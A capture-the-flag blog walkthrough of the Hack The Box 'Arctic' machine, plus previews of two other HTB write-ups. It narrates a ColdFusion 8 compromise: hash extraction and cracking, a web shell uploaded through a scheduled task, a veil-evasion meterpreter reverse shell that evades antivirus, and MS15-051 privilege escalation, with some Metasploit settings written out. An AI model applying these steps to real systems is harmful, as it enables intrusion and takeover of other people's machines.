(HTB) Arctic Walkthrough

Name: Arctic
IP : 10.10.10.11
OS – Windows
VM Author: ch4p
Writeup Author: Teck_K2


Nmap result

First, try to find the exploit which is available for the particular services running on the target machine, I tried to find but couldn't find any exploit regarding MSRPC no we will jump to FMTP
In the Port :8500

We can see there are two directories try to open both in new tabs
Now Open all the subdirectories maybe we could find something interesting

In the sub-directory /cfdocs I found there is a cold fusing version 8 running

If you see error something like this then don't worry because ColdFusion only allow 2 person at a time and if someone didn't sign out it will keep his session open, So just reset the machine and you are good to go.

This blog maybe be helpful to understand cold fusion
https://jumpespjump.blogspot.co.uk/2014/03/attacking-adobe-coldfusion.html

 In the above blog as describe to get the password hash didn’t work for me so I used this link from another blog to get the page

We got the password hash, The next step to follow is defined in the blog which is not working for me I couldn’t be able to get the admin access, because you have only 30sec to submit the hash and it's really less time, you need very fast hands, I tried that but it's just showing me wrong password so I decided to crack that hash first search for the the hash format using hash-identifier

It’s showing that the hash is sha1(salt)
Now try to crack it using hashcat

We cracked the password the password is = happyday
If it shows you wrong password then try atleast 3-4 times, for me it worked on the 4th try
Now we are logged in as Administrator
Now Go to DEBUGGING & LOGGING tab and click on Scheduled Task now a page will popup click on Schedule New Task.
Before we should create a new task we need to create .cfm file
Creat a new folder in desktop now create a file cfexec.cfm
Now paste this from the blog(site) which I mentioned above into that file

Now open up the terminal in the folder directory and create a simple http server using python

It will start broadcasting our file in our small webserver on port:8000 so we can access it remotely
The fields which are mark in yellow are important to fill now edit this and save.
We need to add the port along with our ip or else coldfusion webserve wouldn’t find it.
And we also need to find the directory in the coldfusion webserver in our case it’s
C:\ColdFusion8\wwwroot\CFIDE\cfexec.cfm
Now save it and you will see the Coldfusion has been connected to our web server

Now try to access our .cfm file

We can access the file

Now try to find the user name and extract the user flag

The output is

Now we know the user name is tolis now try to read the flag by yourself I am not going to show you that.

We got the flag now try to read Admin flag
We don’t have Privilege to access Admin Directory So we need something to privilege our access

By doing sysinfo we got to know the configuration of the machine

What I am gonna do now I am creating a windows-reverse payload upload it to the webserver and execute it and get the reverse meterpreter so it will help us to exploit it.

Now try to upload it in schedule and run it using our cfm shell

And save it and click on run schedule

We can see it has been connectd with our server
Now check for the file we uploaded on the target machine and open msf listener on another terminal

By using Dir command we can see the file has been uploaded to the machine on the desired location now try to execute it

We cannot execute .exe file because there is an antivirus installed I think so we need to bypass it
We will use veil-evasion and will execute the reverse shell in .bat format
Open veil-evasion and type list it will show you all payload available
Now we will use 24) Powershell/meterpreter/rev_tcp
Type use 24 it will select it now set LHOST and LPORT then type generate
Nam the file we will type just arctic because by default veil will add .bat after our file name so we don’t need to add

The payload has been generated now copy it the from the veil directory to the folder which we are using as a SimpleHTTPServer

Now make new task and upload it and run it
In the web command type this

Maybe it will not work in the first go try it 2-3 times
Now we got the reverse shell
We have the useraccess only so we need to do privilege escalation
The System is windows 2008 R2 build 6.1 (7600) something like we faced in bastard so we can use MS15_051 exploit
But we have a x86 meterpreter session and the Architecture is x64 to be able to run the post exploit successfully we need a x64 meterpreter session

So what we can do is we can migrate to a x64 process

As you can see there is x64 cmd.exe process which we can use to migrate to a x64 process let’s try

We migrated to cmd.exe process successfully and now we have x64 meterpreter session
Now try exploit it

Before you proceed remember to change the payload to
>  Set payload windows/x64/meterpreter/reverse_tcp
>  Set target 1
Start exploit if you find the reverse LHOST and LPORT are wrong then stop the exploit and Set LHOST and LPORT as desired, because by default if you use a post exploit the lhost is set to your eth0 IP address and you need reverse on your tun0 IP, and remember you will only be able to change the LHOST and PORT after you run it,and if you try to change the IP before running it once IT will not work,So what you can do is run the exploit check the LHOST if it's not the IP of your tun0 cancel the exploit, change the LHOST and run again.
Now try to exploit

We got the NT AUTHORITY access
Now you can read the Administrator flag.


~Enjoy Hacking and stay NOOB

TeckK2 Guru

Rank: 933 2 63

hackthebox.com

Comments

Post a Comment

Popular posts from this blog

(HTB) October Walkthrough

Image
Name: October IP : 10.10.10.16 OS – Linux VM Author: ch4p Writeup Author: Teck_K2 Nmap result Port 80 is open, Let’s access the web page By accessing the web I got to know that the target machine is using October CMS which is an open source self-hosted CMS platform based on the Laravel PHP framework. In the account section we can Signup and access the app but it is of no use. Now run the dirb and nikto tool and google some available exploit on October CMS Unfortunately I coundn’t find anything useful in the google and Nikto result but I found something useful. But In the Dirb result I found something useful which is /backend page with code:302 which means it will redirect us to somewhere else. Let’s open this in the browser. By accessing the link I got redirected to the Administrative area. Now we have the login page in front of us, we can do bruteforce attack, SQL-injection, etc.. Let’s try some manual brute-forcing. Let's try with (admin:password) It’s sh...
Read more

(HTB) Tenten Walkthrough

Image
Name: Tenten IP : 10.10.10.10 OS – linux VM Author: ch4p Writeup Author: Teck_K2 Nmap result In the target system only port 22 and 80 is open let's try to open it It’s a job portal site and powered by WordPress Let's try to find the version detail IN the /readme.html it’s showing me the version which is 4.7 Now as we now it’s a WordPress site now we will use wpscan It will start enumerating users We got only 1 user One of them is admin we will focus on him only Now we know the username we can try to bruteforce the password After several hours I got no result Let’s enumerate plugins We got 2 plugins installed As we can see one is akismet which is up to date and the second one is job-manger which is also up to date but one version of job manager which is 0.7.25 seems outdated and insecure. Let find out some exploit for that. I find this link in the wpscan description https://vagmour.eu/cve-2015-6668-cv-filename-disclosure-on-job-manager-wordpress-plugin/htt...
Read more